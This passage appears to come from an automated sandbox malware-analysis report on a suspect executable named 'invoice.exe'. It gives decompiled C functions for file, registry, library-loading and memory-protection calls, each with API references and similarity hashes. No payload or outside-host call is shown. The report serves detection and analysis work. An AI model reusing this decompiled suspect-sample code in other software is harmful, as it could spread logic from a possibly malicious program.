                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: d5f40faacd95a21481491f01a0c82694c2c8638f2aef99c4c7bd6aebdaa41cb0
                                            • Instruction ID: 63e30908c11e451fd6d37fbe2862c18829a27713504d584fb03aa75526d5f0f4
                                            • Opcode Fuzzy Hash: d5f40faacd95a21481491f01a0c82694c2c8638f2aef99c4c7bd6aebdaa41cb0
                                            • Instruction Fuzzy Hash: 0D110471A00205EECB14CF64DA889AF7AB4DF04304F20403FE446B72C0D6B88A42DB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E00401389(signed int _a4) {
                                            				intOrPtr* _t6;
                                            				void* _t8;
                                            				void* _t10;
                                            				signed int _t11;
                                            				void* _t12;
                                            				signed int _t16;
                                            				signed int _t17;
                                            				void* _t18;
                                            
                                            				_t17 = _a4;
                                            				while(_t17 >= 0) {
                                            					_t6 = _t17 * 0x1c +  *0x42f450;
                                            					if( *_t6 == 1) {
                                            						break;
                                            					}
                                            					_push(_t6); // executed
                                            					_t8 = E00401434(); // executed
                                            					if(_t8 == 0x7fffffff) {
                                            						return 0x7fffffff;
                                            					}
                                            					_t10 = E0040136D(_t8);
                                            					if(_t10 != 0) {
                                            						_t11 = _t10 - 1;
                                            						_t16 = _t17;
                                            						_t17 = _t11;
                                            						_t12 = _t11 - _t16;
                                            					} else {
                                            						_t12 = _t10 + 1;
                                            						_t17 = _t17 + 1;
                                            					}
                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                            						 *0x42ebec =  *0x42ebec + _t12;
                                            						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ebec, 0x7530,  *0x42ebd4), 0); // executed
                                            					}
                                            				}
                                            				return 0;
                                            			}












                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                            • Instruction ID: f90ead50954d10692fd747fd35726c7c61e2fcf071c036ef7d407bcf2d164b43
                                            • Opcode Fuzzy Hash: 99d94b6b7251e12d57a26b250e6e72915567ed6026f147eeb310830d1348a8a6
                                            • Instruction Fuzzy Hash: 4601F4317242109BE7199B399D04B6A3698E710719F54823FF852F61F1D678EC028B4C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Window$EnableShow
                                            • String ID:
                                            • API String ID: 1136574915-0
                                            • Opcode ID: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
                                            • Instruction ID: 3dc443410be61cb95396677418e376cd67e931bc8a1c74ede8e95758ff339cf3
                                            • Opcode Fuzzy Hash: a14bac78f0f093d0819e34cdb63e8fe71bbe50b719fbc7a327d4eb1dfebe48e0
                                            • Instruction Fuzzy Hash: B3E01272B082129FD714EBB6AA495AE77B4EB40325B10403BE415F11D1DE7888419F5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004062FD(signed int _a4) {
                                            				struct HINSTANCE__* _t5;
                                            				signed int _t10;
                                            
                                            				_t10 = _a4 << 3;
                                            				_t8 =  *(_t10 + 0x40a240);
                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                            				if(_t5 != 0) {
                                            					L2:
                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                            				}
                                            				_t5 = E0040628F(_t8); // executed
                                            				if(_t5 == 0) {
                                            					return 0;
                                            				}
                                            				goto L2;
                                            			}






                                            APIs
                                            • GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                              • Part of subcall function 0040628F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
                                              • Part of subcall function 0040628F: wsprintfA.USER32 ref: 004062DF
                                              • Part of subcall function 0040628F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062F3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                            • String ID:
                                            • API String ID: 2547128583-0
                                            • Opcode ID: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                                            • Instruction ID: 0a5867ae11c12db0e7684f2d0d3995392d51af775f5f68958dac655171f1c28e
                                            • Opcode Fuzzy Hash: ec1a34f72467b36b6d3b50eb043fa95794862aef332a9bc5e598c085f3d55eb5
                                            • Instruction Fuzzy Hash: 83E08C32604221ABD210AB749E0493B63A8EF98740306483EF94AF2240DB3C9C7296A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E00405AFE(CHAR* _a4, long _a8, long _a12) {
                                            				signed int _t5;
                                            				void* _t6;
                                            
                                            				_t5 = GetFileAttributesA(_a4); // executed
                                            				asm("sbb ecx, ecx");
                                            				_t6 = CreateFileA(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                            				return _t6;
                                            			}






                                            APIs
                                            • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\invoice.exe,80000000,00000003), ref: 00405B02
                                            • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B24
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                            • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                            • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                            • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405AD9(CHAR* _a4) {
                                            				signed char _t3;
                                            				signed char _t7;
                                            
                                            				_t3 = GetFileAttributesA(_a4); // executed
                                            				_t7 = _t3;
                                            				if(_t7 != 0xffffffff) {
                                            					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                            				}
                                            				return _t7;
                                            			}






                                            APIs
                                            • GetFileAttributesA.KERNELBASE(?,?,004056F1,?,?,00000000,004058D4,?,?,?,?), ref: 00405ADE
                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405AF2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                            • Instruction ID: a8f15113e5c9b75401305b8f42f7b900fd80c9315a1f16fe78aaf2180abbdc87
                                            • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                            • Instruction Fuzzy Hash: B8D0C972504122ABC2102728AE0889BBB55DB54271702CB35F9B9A26B1DB304C56AA98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004055CF(CHAR* _a4) {
                                            				int _t2;
                                            
                                            				_t2 = CreateDirectoryA(_a4, 0); // executed
                                            				if(_t2 == 0) {
                                            					return GetLastError();
                                            				}
                                            				return 0;
                                            			}





                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,00000000,004031E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 004055D5
                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055E3
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CreateDirectoryErrorLast
                                            • String ID:
                                            • API String ID: 1375471231-0
                                            • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                            • Instruction ID: ff59ce228810ab0b399ea54ffc24e93d20618ce1ebfa51e1db99450e15aaec59
                                            • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                            • Instruction Fuzzy Hash: FAC08C30200101ABDB010B318F08B073A62AB80380F0288396042E00B4CA308004C92E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004025C4(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                            				intOrPtr _t27;
                                            				intOrPtr _t33;
                                            				void* _t38;
                                            				void* _t41;
                                            
                                            				_t33 = __edx;
                                            				 *((intOrPtr*)(_t38 - 8)) = __ebx;
                                            				_t27 = E00402A9F(2);
                                            				_t41 = _t27 - 1;
                                            				 *((intOrPtr*)(_t38 - 0x3c)) = _t33;
                                            				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
                                            				if(_t41 < 0) {
                                            					L24:
                                            					 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t38 - 4));
                                            				} else {
                                            					__ecx = 0x3ff;
                                            					if(__eax > 0x3ff) {
                                            						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
                                            					}
                                            					if( *__esi == __bl) {
                                            						L21:
                                            						__esi =  *((intOrPtr*)(__ebp - 8));
                                            						goto L22;
                                            					} else {
                                            						 *((char*)(__ebp + 0xb)) = __bl;
                                            						 *(__ebp - 0x30) = E00405EDC(__ecx, __esi);
                                            						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
                                            							goto L21;
                                            						} else {
                                            							__esi =  *((intOrPtr*)(__ebp - 8));
                                            							while(1) {
                                            								__eax = __ebp - 0xd;
                                            								__eax = E00405B76( *(__ebp - 0x30), __ebp - 0xd, "true"); // executed
                                            								if(__eax == 0) {
                                            									break;
                                            								}
                                            								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                            									 *(__ebp - 0xd) & 0x000000ff = E00405EC3(__edi,  *(__ebp - 0xd) & 0x000000ff);
                                            								} else {
                                            									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                            										__al =  *(__ebp - 0xd);
                                            										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                            											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, "true");
                                            										} else {
                                            											 *((char*)(__esi + __edi)) = __al;
                                            											__esi = __esi + 1;
                                            										}
                                            										break;
                                            									} else {
                                            										__al =  *(__ebp - 0xd);
                                            										 *((char*)(__esi + __edi)) = __al;
                                            										__esi = __esi + 1;
                                            										 *((char*)(__ebp + 0xb)) = __al;
                                            										if(__al == __bl) {
                                            											break;
                                            										} else {
                                            											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
                                            												continue;
                                            											} else {
                                            												break;
                                            											}
                                            										}
                                            									}
                                            								}
                                            								goto L25;
                                            							}
                                            							L22:
                                            							 *((char*)(__esi + __edi)) = __bl;
                                            							if(_t41 == 0) {
                                            								 *((intOrPtr*)(_t38 - 4)) = 1;
                                            							}
                                            							goto L24;
                                            						}
                                            					}
                                            				}
                                            				L25:
                                            				return 0;
                                            			}








                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: wsprintf
                                            • String ID:
                                            • API String ID: 2111968516-0
                                            • Opcode ID: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
                                            • Instruction ID: 7874e25a1fd417281295b021b6ee833f9e9a2ca8db09fa59ccc2d9f5114d9ff1
                                            • Opcode Fuzzy Hash: e235dcb744ebcc946608d91797e9ef60a83683288e53699933f586765b830fd2
                                            • Instruction Fuzzy Hash: 33213B70D04299BECF318B689548AAEBF709F11304F14847FE4D0B62D1C5BE8A82CF19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 40%
                                            			E00402682(intOrPtr __edx, void* __eflags) {
                                            				long _t7;
                                            				long _t9;
                                            				LONG* _t11;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            				void* _t17;
                                            				void* _t19;
                                            
                                            				_t14 = __edx;
                                            				_push(ds);
                                            				if(__eflags != 0) {
                                            					_t7 = E00402A9F(2);
                                            					_pop(_t13);
                                            					 *((intOrPtr*)(_t19 - 0x3c)) = _t14;
                                            					_t9 = SetFilePointer(E00405EDC(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
                                            					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
                                            						_push(_t9);
                                            						E00405EC3();
                                            					}
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
                                            				return 0;
                                            			}











                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0
                                              • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: FilePointerwsprintf
                                            • String ID:
                                            • API String ID: 327478801-0
                                            • Opcode ID: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
                                            • Instruction ID: f1c15ab6bd15a9d9cc501090f462d0785fe3296bea48be5e975bb3477ad6cc2f
                                            • Opcode Fuzzy Hash: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
                                            • Instruction Fuzzy Hash: 49E06DB2B04216AED700BBA5AA49DBFBB68DB40314F20403BF544F10C1CA788D029B2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405E19(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                            				void* _t7;
                                            				long _t8;
                                            				void* _t9;
                                            
                                            				_t7 = E00405D70(_a4,  &_a12);
                                            				if(_t7 != 0) {
                                            					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                            					return _t8;
                                            				}
                                            				_t9 = 6;
                                            				return _t9;
                                            			}







                                            APIs
                                            • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405E42
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction ID: bcdd098ccac6e5ba1724694a98921d4690075513e21ad273718db18b073b7b07
                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction Fuzzy Hash: 3FE0E67201050DBEDF095F50DD0EDBB371DEB14304F00492EFA55D4090E6B5AD209E74
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405B76(void* _a4, void* _a8, long _a12) {
                                            				int _t7;
                                            				long _t11;
                                            
                                            				_t11 = _a12;
                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                            				if(_t7 == 0 || _t11 != _a12) {
                                            					return 0;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}






                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                            • Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
                                            • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                            • Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405BA5(void* _a4, void* _a8, long _a12) {
                                            				int _t7;
                                            				long _t11;
                                            
                                            				_t11 = _a12;
                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                            				if(_t7 == 0 || _t11 != _a12) {
                                            					return 0;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}






                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                            • Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
                                            • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                            • Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                            
                                            				 *0x10004038 = _a4;
                                            				if(_a8 == 1) {
                                            					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
                                            					 *0x1000404c = 0xc2;
                                            					 *0x1000403c = 0;
                                            					 *0x10004044 = 0;
                                            					 *0x10004058 = 0;
                                            					 *0x10004048 = 0;
                                            					 *0x10004040 = 0;
                                            					 *0x10004050 = 0;
                                            					 *0x1000404e = 0;
                                            				}
                                            				return 1;
                                            			}




                                            APIs
                                            • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                            • Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
                                            • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                            • Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00405DEB(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                            				void* _t7;
                                            				long _t8;
                                            				void* _t9;
                                            
                                            				_t7 = E00405D70(_a4,  &_a12);
                                            				if(_t7 != 0) {
                                            					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
                                            					return _t8;
                                            				}
                                            				_t9 = 6;
                                            				return _t9;
                                            			}







                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E79,?,?,?,?,00000002,Call), ref: 00405E0F
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction ID: dc79c12829c29cd0bf07e2dbeefb197667dc07549b84f10616122407915bdb74
                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction Fuzzy Hash: E4D0123210060DBBDF115F90ED05FAB371DEB48314F004826FE45A4091E775D670AF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040159D() {
                                            				int _t5;
                                            				void* _t11;
                                            				int _t14;
                                            
                                            				_t5 = SetFileAttributesA(E00402AC1(0xfffffff0),  *(_t11 - 0x24)); // executed
                                            				_t14 = _t5;
                                            				if(_t14 == 0) {
                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                            				}
                                            				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t11 - 4));
                                            				return 0;
                                            			}







                                            APIs
                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 5ad63c811bd6e2538171b99d50506fd6de1cb9b06f815e9fd29dad5dee90db35
                                            • Instruction ID: 006896c4a7345e69559ade13805c89d17ea4f3f6c129434cfdd3d67a61d48342
                                            • Opcode Fuzzy Hash: 5ad63c811bd6e2538171b99d50506fd6de1cb9b06f815e9fd29dad5dee90db35
                                            • Instruction Fuzzy Hash: 10D012727081129BCB10EBA8AB48A9E77A49B50324B308137D515F31D1E6B9C945672D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404072(int _a4) {
                                            				struct HWND__* _t2;
                                            				long _t3;
                                            
                                            				_t2 =  *0x42ebd8; // 0x103bc
                                            				if(_t2 != 0) {
                                            					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                            					return _t3;
                                            				}
                                            				return _t2;
                                            			}






                                            APIs
                                            • SendMessageA.USER32(000103BC,00000000,00000000,00000000), ref: 00404084
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                            • Instruction ID: da44989f2a2ecf2e1eb1395d2787a6f6d01b979c61270caf9d732ef337717c06
                                            • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                                            • Instruction Fuzzy Hash: B6C04C717406006AEA208B519E49F0677586750B11F1484397751F50D0C675E410DE1C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
